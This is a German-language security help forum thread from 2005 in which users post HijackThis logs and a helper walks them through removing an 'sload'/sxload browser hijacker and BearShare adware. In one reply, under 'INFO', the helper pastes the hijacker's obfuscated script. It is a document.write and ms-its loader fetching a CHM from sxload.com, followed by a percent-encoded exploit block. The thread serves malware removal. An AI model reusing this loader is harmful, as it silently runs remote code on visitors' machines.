Browser öffnet sich einfach+ Run: [sload] "C:\WINDOWS\sload.exe"

#0
18.05.2005, 13:42
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#16 KURD

Lade+ scanne:
Microsoft-Antispyware-Tool
http://virus-protect.org/antispywaretools.html

Lade + scanne (nach Anweisung)
Ad-aware SE Personal+AdAware-VX2 Cleaner
http://virus-protect.org/antispywaretools.html
__________
MfG Sabina

rund um die PC-Sicherheit
Seitenanfang Seitenende
18.05.2005, 20:37
...neu hier

Beiträge: 8
#17 ok hab beides gemacht. bei antyspy hat der nur ein trojaner gefunden und ad-awere hat 14 obejekte und VX2 hat nix gefunden alles sauber. wars des oder kommt noch etwas??
Seitenanfang Seitenende
18.05.2005, 23:32
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#18 nun, du bist entlassen ;) Alles Gute fuer dich + PC ;)
__________
MfG Sabina

rund um die PC-Sicherheit
Seitenanfang Seitenende
19.05.2005, 12:14
...neu hier

Beiträge: 8
#19 Ich danke dir Sabina wo wäre ich bloss ohne dich danke nochmals und wünsch dir alles gute im leben.Thanks for all
Dieser Beitrag wurde am 19.05.2005 um 12:16 Uhr von KURD editiert.
Seitenanfang Seitenende
01.06.2005, 18:39
...neu hier

Beiträge: 3
#20 Hallo!

Evtl. könnt ihr mir ja auch helfen! Ich habe fast das gleiche Problem. Ich kann den PC ganz normal bedienen und dann öffnet sich einfach der IE und zeigt irgendwelche Werbung an. Ich habschon sämtliche scenner die ich kenne durchlaufen lassen! Bei Hijacker kommt das hier raus:

Logfile of HijackThis v1.99.1
Scan saved at 18:39:06, on 01.06.2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccSetMgr.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\SNDSrvc.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Norton AntiVirus\navapsvc.exe
C:\Programme\Norton AntiVirus\IWP\NPFMntor.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Programme\Analog Devices\SoundMAX\SMAgent.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Programme\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Programme\Analog Devices\SoundMAX\Smax4.exe
C:\PROGRA~1\A4Tech\Mouse\Amoumain.exe
C:\WINDOWS\mHotkey.exe
C:\WINDOWS\sload.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\System32\RUNDLL32.EXE
C:\Programme\Teamspeak2_RC2\TeamSpeak.exe
C:\Dokumente und Einstellungen\Eichi\Desktop\956_Fadenkreuz.exe
C:\Programme\Internet Explorer\IEXPLORE.EXE
C:\Programme\Internet Explorer\IEXPLORE.EXE
C:\Programme\WinRAR\WinRAR.exe
C:\DOKUME~1\Eichi\LOKALE~1\Temp\Rar$EX00.984\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Programme\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Programme\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Programme\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Programme\Analog Devices\SoundMAX\Smax4.exe" /tray
O4 - HKLM\..\Run: [WheelMouse] C:\PROGRA~1\A4Tech\Mouse\Amoumain.exe
O4 - HKLM\..\Run: [CHotkey] mHotkey.exe
O4 - HKLM\..\Run: [sload] "C:\WINDOWS\sload.exe"
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [gcasServ] "C:\Programme\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit
O4 - Startup: Adobe Gamma.lnk = C:\Programme\Gemeinsame Dateien\Adobe\Calibration\Adobe Gamma Loader.exe
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O12 - Plugin for .spop: C:\Programme\Internet Explorer\Plugins\NPDocBox.dll
O15 - Trusted Zone: *.sxload.com
O23 - Service: Adobe LM Service - Adobe Systems - C:\Programme\Gemeinsame Dateien\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccSetMgr.exe
O23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Programme\Norton AntiVirus\navapsvc.exe
O23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Programme\Norton AntiVirus\IWP\NPFMntor.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: SAVScan - Symantec Corporation - C:\Programme\Norton AntiVirus\SAVScan.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\GEMEIN~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\SNDSrvc.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Programme\Analog Devices\SoundMAX\SMAgent.exe
O23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\SPBBC\SPBBCSvc.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\CCPD-LC\symlcsvc.exe

Wäre echt geil wenn ihr mir helfen würdet! Danke schon mal!

MfG Eichi
Seitenanfang Seitenende
01.06.2005, 22:44
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#21 Hallo@Eichi

•Gehe auf diese Seite: http://www.lavasofthelp.com/submit/
kopiere in das Fenster
"Submission File":
nacheinander alle diese Dateien:

C:\WINDOWS\switpb.exe
C:\WINDOWS\sload.exe


Start-->Ausfuehren--> regedit

ueberpruefe bitte, ob du folgende Eintraege in der Registry findest, wenn ja, mit rechtsklick loeechen

HKEY_LOCAL_MACHINE\SOFTWARE\switp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\switp


PC neustarten

•Deinstallieren:(falls es existiert ;) )
"Start -> Einstellungen -> Systemsteuerung -> Software" -->OfferAgent

•KillBox
http://virus-protect.org/killbox.html
Anleitung: (bebildert)

•Delete File on Reboot <--anhaken

und klicke auf das rote Kreuz,
wenn gefragt wird, ob "Do you want to reboot? "----> klicke auf "no",und kopiere das naechste rein, erst beim letzten auf "yes"

C:\WINDOWS\sxload.com
C:\WINDOWS\switpb.exe
C:\WINDOWS\sload.exe

PC neustarten

#öffne das HijackThis-->> Button "scan" -->> Häkchen setzen -->> Button "Fix checked" -->> PC neustarten

O4 - HKLM\..\Run: [sload] "C:\WINDOWS\sload.exe"
O15 - Trusted Zone: *.sxload.com

PC neustarten

CCleaner--> loesche alle *temp-Datein
http://virus-protect.org/temp.html

mache einen Onlinescan mit Panda + berichte+ poste das neue log vom HijackThis
http://virus-protect.org/onlinescan.html

--------------------------------

INFO:

document.write('<object height="1" width="1" data="${PR}" type="text/x-scriptlet"></object>'); document.write(' var qwe="ms-i";qwe+="ts:mh";qwe+="tml:fi";qwe+="le://c:\\\\nosu";qwe+="xxx.mh";qwe+="t!http://sxload.com/da";
qwe+="ta/sload.ch";qwe+="m:";qwe+=":/xa.htm"; docu'+'ment.wri'+'te(cxwdi.value.replace(/\\${PR}/g,qwe)); '); // document.write(unescape('%3C%73%70%61%6E%20%64%61%74%61%73%72%63%3D%22%23%6F%45%78%65%63%22%20%
64%61%74%61%66%6C%64%3D%22%65%78%70%6C%6F%69%74%22%20%64%61%74%61%66%6F%72%6D%61%74%61
%73%3D%22%68%
74%6D%6C%22%3E%3C%2F%73%70%61%6E%3E%0D%0A%3C%78%6D%6C%20%69%64%3D%22%6F%45%78%65%63%22%
3E%0D%0A%20%20%20%20%3
C%73%65%63%75%72%69%74%79%3E%0D%0A%20%20%20%20%20%20%20%3C%65%78%70%6C%6F%69%74%3E
%0D%0A%20%20%20%20%20%20%20%
20%20%20%20%20%3C%21%5B%43%44%41%54%41%5B%0D%0A%20%20%20%20%20%20%20%20%20%
20%20%20%3C%6F%62%6A%65%63%74%20%69%
64%3D%22%6F%46%69%6C%65%22%20%64%61%74%61%3D%22%68%74%74%70%3A%2F%2F%73%78%6C%6F%61%64%2E
%63%6F%6D%2F%64%61%74%
61%2F%73%68%74%61%2E%70%%70%22%3E%3C%2F%6F%62%6A%65%63%74%3E%0D%0A%20%20%20%20%20%20%20
%20%20%20%20%5D%5D%3E%0D
%0A%20%20%20%20%20%20%20%3C%2F%65%78%70%6C%6F%69%74%3E%0D%0A%20%20%20%20%3C%2F%73%65%63
%75%72%69%74%79%3E%0D%0A
%3C%2F%78%6D%C%3E')); // document.write(unescape('%3C%49%46%52%41%4D%45%20%57%49%44%54%48%3D%31%20%48%45%49%47%48%54%3D
%31%20%53%52%43%3D
__________
MfG Sabina

rund um die PC-Sicherheit
Seitenanfang Seitenende
02.06.2005, 13:02
...neu hier

Beiträge: 3
#22 Alles klar habs soweit!

HiJackThis:

Logfile of HijackThis v1.99.1
Scan saved at 13:01:04, on 02.06.2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccSetMgr.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\SNDSrvc.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Norton AntiVirus\navapsvc.exe
C:\Programme\Norton AntiVirus\IWP\NPFMntor.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Programme\Analog Devices\SoundMAX\SMAgent.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Programme\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Programme\Analog Devices\SoundMAX\Smax4.exe
C:\PROGRA~1\A4Tech\Mouse\Amoumain.exe
C:\WINDOWS\mHotkey.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\System32\RUNDLL32.EXE
C:\Programme\Microsoft AntiSpyware\gcasDtServ.exe
C:\Programme\Internet Explorer\IEXPLORE.EXE
C:\DOKUME~1\Eichi\LOKALE~1\Temp\Rar$EX00.797\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Programme\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Programme\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Programme\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Programme\Analog Devices\SoundMAX\Smax4.exe" /tray
O4 - HKLM\..\Run: [WheelMouse] C:\PROGRA~1\A4Tech\Mouse\Amoumain.exe
O4 - HKLM\..\Run: [CHotkey] mHotkey.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [gcasServ] "C:\Programme\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [ccApp] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit
O4 - Startup: Adobe Gamma.lnk = C:\Programme\Gemeinsame Dateien\Adobe\Calibration\Adobe Gamma Loader.exe
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O12 - Plugin for .spop: C:\Programme\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O23 - Service: Adobe LM Service - Adobe Systems - C:\Programme\Gemeinsame Dateien\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccSetMgr.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Programme\Gemeinsame Dateien\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Programme\Norton AntiVirus\navapsvc.exe
O23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Programme\Norton AntiVirus\IWP\NPFMntor.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: SAVScan - Symantec Corporation - C:\Programme\Norton AntiVirus\SAVScan.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\GEMEIN~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\SNDSrvc.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Programme\Analog Devices\SoundMAX\SMAgent.exe
O23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\SPBBC\SPBBCSvc.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\CCPD-LC\symlcsvc.exe

Und Bericht von Panda:


Incident Status Location

Adware:Adware/SaveNow No disinfected Windows Registry
Adware:Adware/Admess No disinfected C:\WINDOWS\System32\tmp3.txt
Adware:Adware/SaveNow No disinfected C:\Programme\BearShare\Installer\saveinstwm.exe
Possible Virus. No disinfected C:\Programme\GameSpy Arcade\fpupdate.exe
Adware:Adware/Admess No disinfected C:\WINDOWS\SYSTEM32\tmp3.txt
MfG Eichi
Seitenanfang Seitenende
02.06.2005, 14:24
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#23 Hallo@Eichi

Koenntest du mir bitte schreiben, ob du alles gefunden hast, was ich geschrieben hatte?? (OfferAgent) Der Hijacker ist neu und ich brauche ein Feedback ;)

•KillBox
http://bilder.informationsarchiv.net/Nikitas_Tools/KillBox.zip
Anleitung: (bebildert)
http://virus-protect.org/killbox.html

•Delete File on Reboot <--anhaken

und klicke auf das rote Kreuz,
wenn gefragt wird, ob "Do you want to reboot? "----> klicke auf "no",und kopiere das naechste rein, erst beim letzten auf "yes"

C:\WINDOWS\System32\tmp3.txt
C:\Programme\BearShare\Installer\saveinstwm.exe


PC neustarten

loeschen:
C:\Programme\BearShare

Falls du das in der Registry findest, mit rechtklick loeschen.

Start-->Ausfuehren--> regedit

HKEY_LOCAL_MACHINE\software\magnet
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\bearshare
HKEY_USERS\.default\appevents\eventlabels\bearsharechatnotifymsg
HKEY_USERS\.default\appevents\schemes\apps\bearshare


•Ad-aware SE Personal 1.05 Updated
http://virus-protect.org/antispywaretools.html
Laden--> Updaten-->Konfigurieren
http://virus-protect.org/adaware.html
#VOR jedem Scanvorgang das Programm Updaten!
waehrend des Scanvorganges müssen ALLE sonstige
Anwendungen beendet werden und alle Browserfenster müssen
geschlossen sein!
scannen-->PC neustarten--> noch mal scannen--> poste das Log vom Scan
__________
MfG Sabina

rund um die PC-Sicherheit
Seitenanfang Seitenende
02.06.2005, 16:44
...neu hier

Beiträge: 3
#24 Jo, alles bestens! War alles super beschrieben und Bedienung war (meiner Meinung nach) sehr einfach! Besten Dank!!

MfG Eichi
Seitenanfang Seitenende
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren:
  • »
  • »
  • »
  • »
  • »